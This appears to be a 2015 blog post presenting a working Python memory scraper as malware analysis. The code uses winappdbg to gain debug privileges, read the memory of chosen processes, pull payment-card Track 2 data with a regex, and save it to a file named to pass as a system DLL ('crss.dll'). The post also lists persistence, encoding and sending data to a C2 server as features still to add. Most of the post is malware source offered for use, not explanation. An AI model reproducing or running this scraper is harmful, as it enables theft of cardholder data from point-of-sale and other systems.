Memory Process Scraper: Analysis

12/2/2015

Malware Analysis: Dump Scraper Implementation in Python Using winappdbg, getpass, re, sys

Method of Operation of Scanning explorer.exe for Dump Data:
(1) Show the Windows version and the current architecture (from winappdbg (System.os, System.arch, System.bits))
(2) Create a snapshot of running processes (from winappdbg.System (request_debug_privileges(), scan_processes())
(3) Obtain local username (from getpass.getuser())
(4) Create a writeable file in Application Data
Dump_Writer = open('C:\\Documents and Settings\\'+UserName+'\\Application Data\\\\crss.dll', 'w+')
(5) Obtain all processes that match the requested filenames.
# Elevate privileges
system.request_debug_privileges()
system.scan_processes()
for process, filename in system.find_processes_by_filename("explorer.exe"):
pid = process.get_pid()
bits = process.get_bits()
print pid, bits
(6) Get a memory map of the process.
memoryMap = process.get_memory_map()
mappedFilenames = process.get_mapped_filenames(memoryMap)
(7) For each memory block in the map read address and size of memory blocks, its state (free or allocated), page protection bits (looking for win32.MEM_COMMIT), and its memory type
(8) Read the data from memory if mbi.has_content() and mbi.State == win32.MEM_COMMIT
Data = process.read(BaseAddress, RegionSize)
(9) Implement a simple Regular Expression looking for Track2 data
Dump_Regex = re.findall(r'%B\d{0,19}\^[\w\s\/]{2,26}\^\d{7}\w*\?', Data)
Dump_Data.append(Dump_Regex)
(10) Beatufy the extracted dump data
(11) Write dump data into crss.dll

Missing features are as follows:
(1) Add Registry Persistence
(2) Encode Saved Data
(3) Add Luhn Algorithm
(4) Create a process for this algorithm
(5) Send data to email/C2

import sys
import winappdbg
from winappdbg import System, win32
import re
import getpass

# Show the Windows version and the current architecture.
print "Running on %s for the %s architecture." % (System.os, System.arch)
if System.wow64:
print "Running in 32 bit emulation mode."
print "From this Python VM we can attach to %d-bit processes." % System.bits

# Create a snaphot of running processes.
system = winappdbg.System()
system.request_debug_privileges()
system.scan_processes()
UserName = getpass.getuser()
# if win64 is active, follows the following filesystem convention
# Dump_Writer = open('C:\\Users\\'+UserName+'\\AppData\\Roaming\\athena.dll', 'w+')
Dump_Writer = open('C:\\Documents and Settings\\'+UserName+'\\Application Data\\\\crss.dll', 'w+')
Dump_Data = []

# Get all processes that match the requested filenames.
for filename in sys.argv[1:]:
print "Looking for: %s" % filename
for process, pathname in system.find_processes_by_filename(filename):
pid = process.get_pid()
bits = process.get_bits()
print "Dumping memory for process ID %d (%d bits)" % (pid, bits)

# Get a memory map of the process.
memoryMap = process.get_memory_map()
mappedFilenames = process.get_mapped_filenames(memoryMap)

# For each memory block in the map...
for mbi in memoryMap:

# Address and size of memory block.
BaseAddress = mbi.BaseAddress
RegionSize = mbi.RegionSize

# State (free or allocated).
if mbi.State == win32.MEM_RESERVE:
State = "Reserved"
elif mbi.State == win32.MEM_COMMIT:
State = "Commited"
elif mbi.State == win32.MEM_FREE:
State = "Free"
else:
State = "Unknown"

# Page protection bits (R/W/X/G).
if mbi.State != win32.MEM_COMMIT:
Protect = ""
else:
if mbi.Protect & win32.PAGE_NOACCESS:
Protect = "--- "
elif mbi.Protect & win32.PAGE_READONLY:
Protect = "R-- "
elif mbi.Protect & win32.PAGE_READWRITE:
Protect = "RW- "
elif mbi.Protect & win32.PAGE_WRITECOPY:
Protect = "RC- "
elif mbi.Protect & win32.PAGE_EXECUTE:
Protect = "--X "
elif mbi.Protect & win32.PAGE_EXECUTE_READ:
Protect = "R-X "
elif mbi.Protect & win32.PAGE_EXECUTE_READWRITE:
Protect = "RWX "
elif mbi.Protect & win32.PAGE_EXECUTE_WRITECOPY:
Protect = "RCX "
else:
Protect = "??? "
if mbi.Protect & win32.PAGE_GUARD:
Protect += "G"
else:
Protect += "-"
if mbi.Protect & win32.PAGE_NOCACHE:
Protect += "N"
else:
Protect += "-"
if mbi.Protect & win32.PAGE_WRITECOMBINE:
Protect += "W"
else:
Protect += "-"

# Type (file mapping, executable image, or private memory).
if mbi.Type == win32.MEM_IMAGE:
Type = "Image"
elif mbi.Type == win32.MEM_MAPPED:
Type = "Mapped"
elif mbi.Type == win32.MEM_PRIVATE:
Type = "Private"
elif mbi.Type == 0:
Type = ""
else:
Type = "Unknown"

# Mapped file name, if any.
FileName = mappedFilenames.get(BaseAddress, None)

# Read the data contained in the memory block, if any.
Data = None
if mbi.has_content() and mbi.State == win32.MEM_COMMIT:
## print 'Reading %s-%s' % (
## winappdbg.HexDump.address(BaseAddress, bits),
## winappdbg.HexDump.address(BaseAddress + RegionSize, bits)
## )
Data = process.read(BaseAddress, RegionSize)
Dump_Regex = re.findall(r'%B\d{0,19}\^[\w\s\/]{2,26}\^\d{7}\w*\?', Data)
Dump_Data.append(Dump_Regex)
Clean_Dump = []
for i in Dump_Data:
i = str(i)
if str(i) not in Clean_Dump:
Clean_Dump.append(str(i))
Clean_Dump.pop(0)
i = str(Clean_Dump[0])
line = re.sub('\[', '', i)
line1 = re.sub('\]', '', line)
line2 = re.sub('\'', '', line1)
line3 = re.sub('\s', '', line2)
g = line3.split(',')
g = set(g)
for i in g:
if i not in Dump_Writer:
Dump_Writer.write(i + "\n")
print "Done."
Dump_Writer.close()

'''
from distutils.core import setup
setup(
  name='ramscraper',
  version='1.0',
  packages=['sys, winappdbg, re, getpass'],
  url='http://www.vkremez.com',
  license='Apache License, Version 2.0',
  author='Administrator',
  author_email='vitali@vkremez.com',
  description='Memory Scraper Emulation'
)
'''

0 Comments

Memory Process Scraper: Analysis

Leave a Reply.

Author

Archives

Categories

Memory Process Scraper: Analysis﻿